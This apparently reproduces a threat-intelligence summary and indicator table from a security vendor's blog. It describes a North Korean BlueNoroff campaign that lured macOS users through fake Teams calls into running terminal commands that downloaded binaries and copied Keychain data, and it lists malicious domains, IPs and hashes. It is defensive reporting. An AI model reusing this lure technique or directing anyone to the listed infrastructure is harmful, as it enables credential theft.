North Korea’s “Prospect Call” Trap: Lazarus Turns Teams Meetings into macOS Credential Theft
2026-01-29 • Daylight •
https://daylight.ai/blog/prospect-call-microsoft-teams-meetings
Daylight Security investigated a macOS intrusion attributed in the source to BlueNoroff, a financially motivated subgroup of North Korea’s Lazarus Group, and aligned it with the GhostCall campaign pattern. The attacker began with a Telegram business-prospect pretext, moved the victim to a Microsoft Teams call on a lookalike domain, and used audio-troubleshooting instructions to make the victim run terminal commands. The observed chain used native macOS tools including curl, chmod, codesign, nohup, and osascript to download and execute binaries from cache and temporary paths, stage data, and copy the user’s Keychain database. Infrastructure included teams.microscall[.]com, microsmeet[.]xyz, bluyy[.]com, supportzm[.]com, and Hostwinds IP addresses, showing how live social engineering can turn routine business workflows into credential-theft operations.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| DOMAIN | teams.microscall.com | 2026-01-29 | 2026-03-11 |
| DOMAIN | supportzm.com | 2026-01-29 | 2026-03-02 |
| HASH | b302be4f9c515eb68d3e8b1ad8388d4… | 2026-01-29 | 2026-01-29 |
| HASH | ede7f3ece611ba6c1ac4a02cf6a618b… | 2026-01-29 | 2026-01-29 |
| HASH | e3ed631addd7242e8c1f6faa9008774… | 2026-01-29 | 2026-01-29 |
| HASH | de664ae9a35ec7f156962df168d876c… | 2026-01-29 | 2026-01-29 |
| HASH | 18ec3c93e076e16447aee6fa390a44d… | 2026-01-29 | 2026-01-29 |
| HASH | 75a82b9a2e7cfa0002fbbd1dbcb0bfa… | 2026-01-29 | 2026-01-29 |
| URL | https://microsmeet.xyz/ | 2026-01-29 | 2026-01-29 |
| DOMAIN | microsmeet.xyz | 2026-01-29 | 2026-01-29 |
| DOMAIN | bluyy.com | 2026-01-29 | 2026-01-29 |
| IPv4 | 23.254.130.131 | 2026-01-29 | 2026-01-29 |
| IPv4 | 23.254.204.184 | 2025-06-20 | 2026-01-29 |